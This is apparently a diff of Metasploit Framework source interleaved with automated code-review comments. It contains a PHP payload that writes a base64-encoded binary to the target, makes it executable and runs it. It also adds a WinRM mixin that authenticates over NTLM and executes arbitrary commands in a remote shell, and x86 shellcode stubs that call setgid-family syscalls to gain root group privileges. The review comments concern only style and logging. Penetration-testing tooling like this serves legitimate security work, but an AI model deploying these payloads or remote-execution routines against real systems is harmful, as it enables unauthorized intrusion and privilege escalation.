||||
case target_arch.first
|
||||
when ARCH_PHP
|
||||
php = payload.encoded
|
||||
else
|
||||
bin_name = Rex::Text.rand_text_alpha(8)
|
||||
if opts[:writable_path]
|
||||
bin_name = [opts[:writable_path], bin_name].join("/")
|
||||
else
|
||||
bin_name = "./#{bin_name}"
|
||||
end
|
||||
if target["Platform"] == 'win'
|
||||
bin_name << ".exe"
|
||||
print_debug("Unable to clean up #{bin_name}, delete it manually")
|
||||
end
|
||||
p = Rex::Text.encode_base64(generate_payload_exe)
|
||||
php = %Q{
|
||||
error_reporting(0);
|
||||
$ex = "#{bin_name}";
|
||||
$f = fopen($ex, "wb");
|
||||
fwrite($f, base64_decode("#{p}"));
|
||||
fclose($f);
|
||||
chmod($ex, 0777);
|
||||
function my_cmd($cmd) {
|
||||
#{php_preamble}
|
||||
#{php_system_block};
|
||||
}
|
||||
if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
|
||||
my_cmd($ex . "&");
|
||||
} else {
|
||||
my_cmd($ex);
|
||||
}
|
||||
unlink($ex);
|
||||
}
|
||||
end
|
||||
|
||||
if opts[:unlink_self]
|
||||
php << "unlink(__FILE__);"
|
||||
end
|
||||
|
||||
php.gsub!(/#.*$/, '')
|
||||
php.gsub!(/[\t ]+/, ' ')
|
||||
php.gsub!(/\n/, ' ')
|
||||
return "<?php #{php} ?>"
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
end
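Review bot: `print_debug("Unable to clean up #{bin_name}, delete it manually")` is emitted when the payload string is generated, not when anything has run on the target, so it fires even if the module never delivers the payload; the YARD block already says the unlink "will certainly fail on Windows", but the message reads as if a cleanup attempt happened. Either reword it to make the timing explicit or put a one-line comment above it: `# Generation-time notice only: the PHP below still calls unlink(), which fails on Windows`. The three `gsub!` passes at the end (`php.gsub!(/#.*$/, '')` and the whitespace/newline collapses) run over the whole assembled string, including `payload.encoded` in the ARCH_PHP branch and the caller-supplied `:writable_path`, so any `#` in those is treated as a comment marker up to end of line; that assumption belongs in the method's YARD text so callers of get_write_exec_payload know to avoid it.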
|
|
@ -0,0 +1,471 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'uri'
|
||||
require 'digest'
|
||||
require 'rex/proto/ntlm/crypt'
|
||||
require 'rex/proto/ntlm/constants'
|
||||
require 'rex/proto/ntlm/utils'
|
||||
require 'rex/proto/ntlm/exceptions'
|
||||
|
||||
module Msf
|
||||
module Exploit::Remote::WinRM
|
||||
|
||||
include Exploit::Remote::NTLM::Client
|
||||
include Exploit::Remote::HttpClient
|
||||
|
||||
#
|
||||
# Constants
|
||||
#
|
||||
NTLM_CRYPT ||= Rex::Proto::NTLM::Crypt
|
||||
NTLM_CONST ||= Rex::Proto::NTLM::Constants
|
||||
NTLM_UTILS ||= Rex::Proto::NTLM::Utils
|
||||
NTLM_XCEPT ||= Rex::Proto::NTLM::Exceptions
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
Opt::RPORT(5985),
|
||||
OptString.new('VHOST', [ false, "HTTP server virtual host" ]),
|
||||
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]),
|
||||
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentification', 'WORKSTATION']),
|
||||
OptString.new('URI', [ true, "The URI of the WinRM service", "/wsman" ]),
|
||||
OptString.new('USERNAME', [ false, 'A specific username to authenticate as' ]),
|
||||
OptString.new('PASSWORD', [ false, 'A specific password to authenticate with' ])
|
||||
], self.class
|
||||
)
|
||||
|
||||
register_autofilter_ports([ 80,443,5985,5986 ])
|
||||
register_autofilter_services(%W{ winrm })
|
||||
end
|
||||
|
||||
def winrm_poke(timeout = 20)
|
||||
opts = {
|
||||
'uri' => datastore['URI'],
|
||||
'data' => Rex::Text.rand_text_alpha(8)
|
||||
}
|
||||
|
||||
c = connect(opts)
|
||||
to = opts[:timeout] || timeout
|
||||
ctype = "application/soap+xml;charset=UTF-8"
|
||||
|
||||
resp, c = send_request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'data' => opts['data']
|
||||
}), to)
|
||||
|
||||
return resp
|
||||
end
|
||||
|
||||
def parse_auth_methods(resp)
|
||||
return [] unless resp and resp.code == 401
|
||||
methods = []
|
||||
methods << "Negotiate" if resp.headers['WWW-Authenticate'].include? "Negotiate"
|
||||
methods << "Kerberos" if resp.headers['WWW-Authenticate'].include? "Kerberos"
|
||||
methods << "Basic" if resp.headers['WWW-Authenticate'].include? "Basic"
|
||||
return methods
|
||||
end
|
||||
|
||||
def winrm_run_cmd(cmd, timeout=20)
|
||||
resp,c = send_request_ntlm(winrm_open_shell_msg,timeout)
|
||||
|
||||
if resp.code == 401
|
||||
print_error "Login failure! Recheck supplied credentials."
|
||||
return resp .code
|
||||
end
|
||||
|
||||
unless resp.code == 200
|
||||
print_error "Got unexpected response: \n #{resp.to_s}"
|
||||
retval == resp.code || 0
|
||||
return retval
|
||||
end
|
||||
|
||||
shell_id = winrm_get_shell_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id),timeout)
|
||||
cmd_id = winrm_get_cmd_id(resp)
|
||||
resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id),timeout)
|
||||
streams = winrm_get_cmd_streams(resp)
|
||||
resp,c = send_request_ntlm(winrm_terminate_cmd_msg(shell_id,cmd_id),timeout)
|
||||
resp,c = send_request_ntlm(winrm_delete_shell_msg(shell_id))
|
||||
|
||||
return streams
|
||||
end
|
||||
|
||||
def winrm_wql_msg(wql)
|
||||
action = winrm_uri_action("wql")
|
||||
contents = winrm_header(action) + winrm_wql_body(wql)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_open_shell_msg
|
||||
action = winrm_uri_action("create_shell")
|
||||
options = winrm_option_set([['WINRS_NOPROFILE', 'FALSE'], ['WINRS_CODEPAGE', '437']])
|
||||
header_data = action + options
|
||||
contents = winrm_header(header_data) + winrm_open_shell_body
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_cmd_msg(cmd,shell_id)
|
||||
action = winrm_uri_action("send_cmd")
|
||||
options = winrm_option_set([['WINRS_CONSOLEMODE_STDIN', 'TRUE'], ['WINRS_SKIP_CMD_SHELL', 'FALSE']])
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + options + selectors
|
||||
contents = winrm_header(header_data) + winrm_cmd_body(cmd)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_cmd_recv_msg(shell_id,cmd_id)
|
||||
action = winrm_uri_action("recv_cmd")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_cmd_recv_body(cmd_id)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_terminate_cmd_msg(shell_id,cmd_id)
|
||||
action = winrm_uri_action("signal_shell")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_terminate_cmd_body(cmd_id)
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def winrm_delete_shell_msg(shell_id)
|
||||
action = winrm_uri_action("delete_shell")
|
||||
selectors = winrm_selector_set([['ShellId', shell_id]])
|
||||
header_data = action + selectors
|
||||
contents = winrm_header(header_data) + winrm_empty_body
|
||||
msg = winrm_envelope(contents)
|
||||
|
||||
return msg
|
||||
end
|
||||
|
||||
def parse_wql_response(response)
|
||||
xml = response.body
|
||||
columns = []
|
||||
rows =[]
|
||||
rxml = REXML::Document.new(xml).root
|
||||
items = rxml.elements["///w:Items"]
|
||||
|
||||
items.elements.to_a("///w:XmlFragment").each do |node|
|
||||
row_data = []
|
||||
|
||||
node.elements.to_a.each do |sub_node|
|
||||
columns << sub_node.name
|
||||
row_data << sub_node.text
|
||||
end
|
||||
|
||||
rows << row_data
|
||||
end
|
||||
|
||||
response_data = Rex::Ui::Text::Table.new(
|
||||
'Header' => "#{datastore['WQL']} (#{rhost})",
|
||||
'Indent' => 1,
|
||||
'Columns' => columns.uniq!
|
||||
)
|
||||
|
||||
rows.each do |row|
|
||||
response_data << row
|
||||
end
|
||||
|
||||
return response_data
|
||||
end
|
||||
|
||||
def winrm_get_shell_id(response)
|
||||
xml = response.body
|
||||
shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_id(response)
|
||||
xml = response.body
|
||||
cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
|
||||
end
|
||||
|
||||
def winrm_get_cmd_streams(response)
|
||||
streams = {
|
||||
'stdout' => '',
|
||||
'stderr' => '',
|
||||
}
|
||||
|
||||
xml = response.body
|
||||
rxml = REXML::Document.new(xml).root
|
||||
|
||||
rxml.elements.to_a("//rsp:Stream").each do |node|
|
||||
next if node.text.nil?
|
||||
streams[node.attributes['Name']] << Rex::Text.base64_decode(node.text)
|
||||
end
|
||||
|
||||
return streams
|
||||
end
|
||||
|
||||
def generate_uuid
|
||||
::Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))
|
||||
end
|
||||
|
||||
def send_request_ntlm(data, timeout = 20)
|
||||
opts = {
|
||||
'uri' => datastore['URI'],
|
||||
'data' => data,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
}
|
||||
|
||||
ntlm_options =
|
||||
{
|
||||
:signing => false,
|
||||
:usentlm2_session => datastore['NTLM::UseNTLM2_session'],
|
||||
:use_ntlmv2 => datastore['NTLM::UseNTLMv2'],
|
||||
:send_lm => datastore['NTLM::SendLM'],
|
||||
:send_ntlm => datastore['NTLM::SendNTLM']
|
||||
}
|
||||
|
||||
ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options)
|
||||
workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
|
||||
domain_name = datastore['DOMAIN']
|
||||
ntlm_message_1 = "NEGOTIATE " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name,
|
||||
workstation_name,
|
||||
ntlmssp_flags))
|
||||
|
||||
to = opts[:timeout] || timeout
|
||||
|
||||
begin
|
||||
c = connect(opts)
|
||||
ctype = "application/soap+xml;charset=UTF-8"
|
||||
# First request to get the challenge
|
||||
r = c.request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'headers' => { 'Authorization' => ntlm_message_1},
|
||||
'data' => opts['data']
|
||||
}))
|
||||
|
||||
resp = c.send_recv(r, to)
|
||||
|
||||
unless resp.kind_of? Rex::Proto::Http::Response
|
||||
return [nil,nil]
|
||||
end
|
||||
|
||||
return [nil,nil] if resp.code == 404
|
||||
return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate']
|
||||
# Get the challenge and craft the response
|
||||
ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NEGOTIATE ([A-Z0-9\x2b\x2f=]+)/i)[1]
|
||||
return [nil,nil] unless ntlm_challenge
|
||||
|
||||
#old and simplier method but not compatible with windows 7/2008r2
|
||||
#ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge)
|
||||
#ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true})
|
||||
ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge)
|
||||
blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2)
|
||||
challenge_key = blob_data[:challenge_key]
|
||||
server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error
|
||||
#netbios name
|
||||
default_name = blob_data[:default_name] || ''
|
||||
#netbios domain
|
||||
default_domain = blob_data[:default_domain] || ''
|
||||
#dns name
|
||||
dns_host_name = blob_data[:dns_host_name] || ''
|
||||
#dns domain
|
||||
dns_domain_name = blob_data[:dns_domain_name] || ''
|
||||
#Client time
|
||||
chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || ''
|
||||
spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost}
|
||||
resp_lm,
|
||||
resp_ntlm,
|
||||
client_challenge,
|
||||
ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key,
|
||||
domain_name, default_name, default_domain,
|
||||
dns_host_name, dns_domain_name, chall_MsvAvTimestamp,
|
||||
spnopt, ntlm_options)
|
||||
ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'],
|
||||
resp_lm, resp_ntlm, '', ntlmssp_flags)
|
||||
ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3)
|
||||
|
||||
# Send the response
|
||||
r = c.request_cgi(opts.merge({
|
||||
'uri' => opts['uri'],
|
||||
'method' => 'POST',
|
||||
'ctype' => ctype,
|
||||
'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"},
|
||||
'data' => opts['data']
|
||||
}))
|
||||
|
||||
resp = c.send_recv(r, to, true)
|
||||
|
||||
unless resp.kind_of? Rex::Proto::Http::Response
|
||||
return [nil,nil]
|
||||
end
|
||||
|
||||
return [nil,nil] if resp.code == 404
|
||||
return [resp,c]
|
||||
rescue ::Errno::EPIPE, ::Timeout::Error
|
||||
end
|
||||
end
|
||||
|
||||
def accepts_ntlm_auth
|
||||
parse_auth_methods(winrm_poke).include? "Negotiate"
|
||||
end
|
||||
|
||||
def target_url
|
||||
proto = "http"
|
||||
if rport == 5986 or datastore['SSL']
|
||||
proto = "https"
|
||||
end
|
||||
|
||||
if datastore['VHOST']
|
||||
return "#{proto}://#{datastore ['VHOST']}:#{rport}#{@uri.to_s}"
|
||||
else
|
||||
return "#{proto}://#{rhost}:#{rport}#{@uri.to_s}"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
||||
private
|
||||
|
||||
def winrm_option_set(options)
|
||||
xml = "<w:OptionSet>"
|
||||
|
||||
options.each do |option_pair|
|
||||
xml << winrm_option(*option_pair)
|
||||
end
|
||||
|
||||
xml << "</w:OptionSet>"
|
||||
return xml
|
||||
end
|
||||
|
||||
def winrm_option(name,value)
|
||||
%Q{<w:Option Name="#{name}">#{value}</w:Option>}
|
||||
end
|
||||
|
||||
def winrm_selector_set(selectors)
|
||||
xml = "<w:SelectorSet>"
|
||||
|
||||
selectors.each do |selector_pair|
|
||||
xml << winrm_selector(*selector_pair)
|
||||
end
|
||||
|
||||
xml << "</w:SelectorSet>"
|
||||
return xml
|
||||
end
|
||||
|
||||
def winrm_selector(name,value)
|
||||
%Q{<w:Selector Name="#{name}">#{value}</w:Selector>}
|
||||
end
|
||||
|
||||
def winrm_wql_body(wql)
|
||||
%Q{
|
||||
<env:Body>
|
||||
<n:Enumerate>
|
||||
<w:OptimizeEnumeration xsi:nil="true"/>
|
||||
<w:MaxElements>32000</w:MaxElements>
|
||||
<w:Filter Dialect="http://schemas.microsoft.com/wbem/wsman/1/WQL">#{wql}</w:Filter>
|
||||
</n:Enumerate>
|
||||
</env:Body>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_open_shell_body
|
||||
%q{<env:Body>
|
||||
<rsp:Shell>
|
||||
<rsp:InputStreams>stdin</rsp:InputStreams>
|
||||
<rsp:OutputStreams>stdout stderr</rsp:OutputStreams>
|
||||
</rsp:Shell>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_cmd_body(cmd)
|
||||
%Q{ <env:Body>
|
||||
<rsp:CommandLine>
|
||||
<rsp:Command>"#{cmd}"</rsp:Command>
|
||||
</rsp:CommandLine>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_cmd_recv_body(cmd_id)
|
||||
%Q{<env:Body>
|
||||
<rsp:Receive>
|
||||
<rsp:DesiredStream CommandId="#{cmd_id}">stdout stderr</rsp:DesiredStream>
|
||||
</rsp:Receive>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_terminate_cmd_body(cmd_id)
|
||||
%Q{ <env:Body>
|
||||
<rsp:Signal CommandId="#{cmd_id}">
|
||||
<rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code>
|
||||
</rsp:Signal>
|
||||
</env:Body>}
|
||||
end
|
||||
|
||||
def winrm_empty_body
|
||||
%q{<env:Body/>}
|
||||
end
|
||||
|
||||
def winrm_envelope(data)
|
||||
%Q{
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<env:Envelope xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd"
|
||||
xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config" xmlns:env="http://www.w3.org/2003/05/soap-envelope"
|
||||
xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"
|
||||
xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"
|
||||
xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> #{data}</env:Envelope>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_header(data)
|
||||
%Q{
|
||||
<env:Header>
|
||||
<a:To>#{target_url}</a:To>
|
||||
<a:ReplyTo>
|
||||
<a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
|
||||
</a:ReplyTo>
|
||||
<w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize>
|
||||
<a:MessageID>uuid:#{generate_uuid}</a:MessageID>
|
||||
<w:Locale mustUnderstand="false" xml:lang="en-US"/>
|
||||
<p:DataLocale mustUnderstand="false" xml:lang="en-US"/>
|
||||
<w:OperationTimeout>PT60S</w:OperationTimeout>
|
||||
#{data}
|
||||
</env:Header>
|
||||
}
|
||||
end
|
||||
|
||||
def winrm_uri_action(type)
|
||||
case type
|
||||
when "wql"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/wmi/root/cimv2/*</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate</a:Action>}
|
||||
when "create_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>}
|
||||
when "send_cmd"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action>}
|
||||
when "recv_cmd"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action>}
|
||||
when "signal_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action>}
|
||||
when "delete_shell"
|
||||
return %q{<w:ResourceURI mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd</w:ResourceURI>
|
||||
<a:Action mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Delete</a:Action>}
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -208,6 +208,10 @@ class Module
|
|||
super(print_prefix + msg)
|
||||
end
|
||||
|
||||
def print_warning(msg='')
|
||||
super(print_prefix + msg)
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Overwrite the Subscriber print_line to do custom prefixes
|
||||
|
@ -241,6 +245,10 @@ class Module
|
|||
def vprint_debug(msg)
|
||||
print_debug(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
end
|
||||
# Verbose version of #print_warning
|
||||
def vprint_warning(msg)
|
||||
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the module's framework full reference name. This is the
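Review bot: `vprint_warning` in the `@ -241,6 +245,10` hunk is added with its `# Verbose version of #print_warning` comment butted directly against the `end` of `vprint_debug`, unlike the other `vprint_*` methods which are separated by a blank line; insert the blank line before the comment. The new `print_warning(msg='')` in the first hunk mirrors its siblings' `super(print_prefix + msg)` form, so no functional concern there.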
|
||||
|
|
|
@ -12,38 +12,39 @@ class Msf::Module::Author
|
|||
# A hash of known author names
|
||||
Known =
|
||||
{
|
||||
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
|
||||
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
|
||||
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
|
||||
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
|
||||
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
||||
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
|
||||
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
|
||||
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
|
||||
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
||||
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
||||
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
|
||||
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
||||
'Ramon de C Valle'=> 'rcvalle' + 0x40.chr + 'metasploit.com',
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
|
||||
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
|
||||
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
|
||||
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
|
||||
'et' => 'et' + 0x40.chr + 'metasploit.com',
|
||||
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
||||
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
|
||||
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
|
||||
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
|
||||
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
||||
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
|
||||
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
|
||||
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
|
||||
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
|
||||
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
||||
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
||||
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
||||
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
|
||||
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com'
|
||||
'hdm' => 'hdm' + 0x40.chr + 'metasploit.com',
|
||||
'spoonm' => 'spoonm' + 0x40.chr + 'no$email.com',
|
||||
'skape' => 'mmiller' + 0x40.chr + 'hick.org',
|
||||
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
|
||||
'optyx' => 'optyx' + 0x40.chr + 'no$email.com',
|
||||
'anonymous' => 'anonymous-contributor' + 0x40.chr + 'metasploit.com',
|
||||
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
|
||||
'MC' => 'mc' + 0x40.chr + 'metasploit.com',
|
||||
'cazz' => 'bmc' + 0x40.chr + 'shmoo.com',
|
||||
'pusscat' => 'pusscat' + 0x40.chr + 'metasploit.com',
|
||||
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
|
||||
'patrick' => 'patrick' + 0x40.chr + 'osisecurity.com.au',
|
||||
'Ramon de C Valle' => 'rcvalle' + 0x40.chr + 'metasploit.com',
|
||||
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
|
||||
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com',
|
||||
'kris katterjohn' => 'katterjohn' + 0x40.chr + 'gmail.com',
|
||||
'CG' => 'cg' + 0x40.chr + 'carnal0wnage.com',
|
||||
'et' => 'et' + 0x40.chr + 'metasploit.com',
|
||||
'sf' => 'stephen_fewer' + 0x40.chr + 'harmonysecurity.com',
|
||||
'kf' => 'kf_list' + 0x40.chr + 'digitalmunition.com',
|
||||
'ddz' => 'ddz' + 0x40.chr + 'theta44.org',
|
||||
'jduck' => 'jduck' + 0x40.chr + 'metasploit.com',
|
||||
'natron' => 'natron' + 0x40.chr + 'metasploit.com',
|
||||
'todb' => 'todb' + 0x40.chr + 'metasploit.com',
|
||||
'msmith' => 'msmith' + 0x40.chr + 'metasploit.com',
|
||||
'jcran' => 'jcran' + 0x40.chr + 'metasploit.com',
|
||||
'sinn3r' => 'sinn3r' + 0x40.chr + 'metasploit.com',
|
||||
'bannedit' => 'bannedit' + 0x40.chr + 'metasploit.com',
|
||||
'amaloteaux' => 'alex_maloteaux' + 0x40.chr + 'metasploit.com',
|
||||
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
|
||||
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
|
||||
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
|
||||
'mubix' => 'mubix' + 0x40.chr + 'hak5.org'
|
||||
}
|
||||
|
||||
#
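Review bot: `Known` is a constant Hash that is left unfrozen, so any caller can mutate the shared author table at runtime; close it with `}.freeze` (the closing brace at the end of this hunk is context, so that is a one-line change). The hunk also rewrites every existing entry only to re-align `=>`, which makes the table print twice and hides the actual addition of `mubix`; keeping the whitespace reformat in its own commit would make the real change reviewable.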
|
||||
|
|
|
@ -40,6 +40,27 @@ module Msf::Payload::Bsd
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setregid(0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setgid(0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('AppendExit',
|
||||
[
|
||||
false,
|
||||
|
@ -99,6 +120,35 @@ module Msf::Payload::Bsd
|
|||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
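Review bot: The `PrependSetresgid`/`PrependSetregid`/`PrependSetgid` option definitions and the x86 stubs in the `@ -99,6 +120,35` hunk are byte-identical to the ones added to `Msf::Payload::Osx` in this commit, and the option definitions are repeated again in `Linux` and `Solaris`; a shared list of the `OptBool`s mixed into each payload module would keep the four copies from drifting. The added block also ends with `end` immediately followed by the pre-existing `# Append` comment, so the blank line that separated the stubs from the append section should be restored at the end of the inserted code.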
|
||||
|
|
|
@ -40,6 +40,27 @@ module Msf::Payload::Linux
|
|||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetresgid',
|
||||
[
|
||||
false,
|
||||
"Prepend a stub that executes the setresgid(0, 0, 0) system call",
|
||||
"false"
|
||||
]
|
||||
),
|
||||
Msf::OptBool.new('PrependSetregid',
|
